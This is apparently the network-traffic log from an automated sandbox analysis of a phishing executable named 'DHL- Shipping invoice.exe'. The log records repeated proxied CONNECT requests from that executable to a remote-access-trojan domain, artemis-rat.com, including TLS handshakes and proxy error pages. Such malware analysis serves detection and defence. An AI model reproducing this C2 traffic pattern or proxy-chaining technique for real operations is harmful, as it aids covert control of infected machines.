                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1281192.168.2.453652117.160.250.13388996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.573108912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.124386072 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1282192.168.2.453168148.72.209.17429066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.578600883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.640789032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.750149965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.843837023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.952905893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:52.952914953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:40.956955910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1283192.168.2.453888184.169.154.119806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.583133936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.746556997 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0
                            Mar 12, 2024 08:37:04.747942924 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 20 9d a7 d5 d0 0e 87 0e bc 40 6d b4 35 45 28 e5 0f cc 04 4a d6 22 06 81 3c 64 56 c8 29 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: e @m5E(J"<dV)*,+0/$#('=<5/Uartemis-rat.com#
                            Mar 12, 2024 08:37:04.914329052 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 b3 a6 ba cf e2 dc 24 70 2b e7 08 54 f7 6c 94 02 2a 05 2c 7f 8c e2 1f 2b 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                            Data Ascii: =9$p+Tl*,+DOWNGRD0000*H010Uartemis-rat.com0240312064851Z260312064851Z010Uartemis-rat.com0"0*H0M^ l4_
                            Mar 12, 2024 08:37:05.003709078 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 3a a8 9f 40 21 df 16 ce b2 71 2b db 09 3f 8d 19 9a 54 3d cf d5 b2 d5 97 32 b3 a6 57 e7 15 80 50 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 00 9e f7 7f c3 46 fe be ca 08 f3 67 67 cf 72 8f 6e cf a9 5b 73
                            Data Ascii: %! :@!q+?T=2WP(Fggrn[su+7
                            Mar 12, 2024 08:37:05.174238920 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 4a f4 b9 ce 8c 73 d4 df c8 3d d9 23 86 c3 03 ad 00 ab e1 a3 cc 15 42 fd 47 c8 b8 3a 5f 07 12 f5 97 2c 7c c7 ea 64 12 df
                            Data Ascii: (Js=#BG:_,|d


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1284192.168.2.453833185.217.143.23806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.592919111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.797386885 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1285192.168.2.453924163.172.94.175216176484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.598216057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1286192.168.2.45390449.13.161.231806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.602348089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1287192.168.2.453293115.127.31.6680806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.607027054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.359385967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.562854052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.750324965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1288192.168.2.453804121.182.138.71806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.615675926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1289192.168.2.453863161.97.163.52641096484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.616691113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.197437048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1290192.168.2.453942195.248.243.14972376484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.617657900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.249824047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.766494036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.953448057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1291192.168.2.452139198.0.198.132543216484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.624372959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1292192.168.2.45387245.11.95.16550266484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.626441956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.197536945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.844249964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.141110897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.750125885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.453303099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.047184944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.250345945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.597244978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1293192.168.2.453875194.53.158.57532816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.627594948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.862667084 CET202INHTTP/1.0 404 Not Found
                            Content-Length: 715
                            Content-Type: text/html
                            Date: Fri, 02 Jan 1970 00:45:41 GMT
                            Expires: Fri, 02 Jan 1970 00:45:41 GMT
                            Server: Mikrotik HttpProxy
                            Proxy-Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1294192.168.2.453900159.224.243.185377936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.636261940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.197451115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.844212055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.141069889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.750083923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.363190889 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1295192.168.2.453774175.183.82.221806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.647650003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1296192.168.2.453771103.127.1.130806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.661252022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1297192.168.2.453885161.97.147.19315996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.661252975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.250094891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953725100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453363895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.265944958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.062645912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.859707117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.562984943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.765362024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1298192.168.2.45382558.234.116.19781976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.661686897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1299192.168.2.453980104.16.224.33806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.667929888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.755394936 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
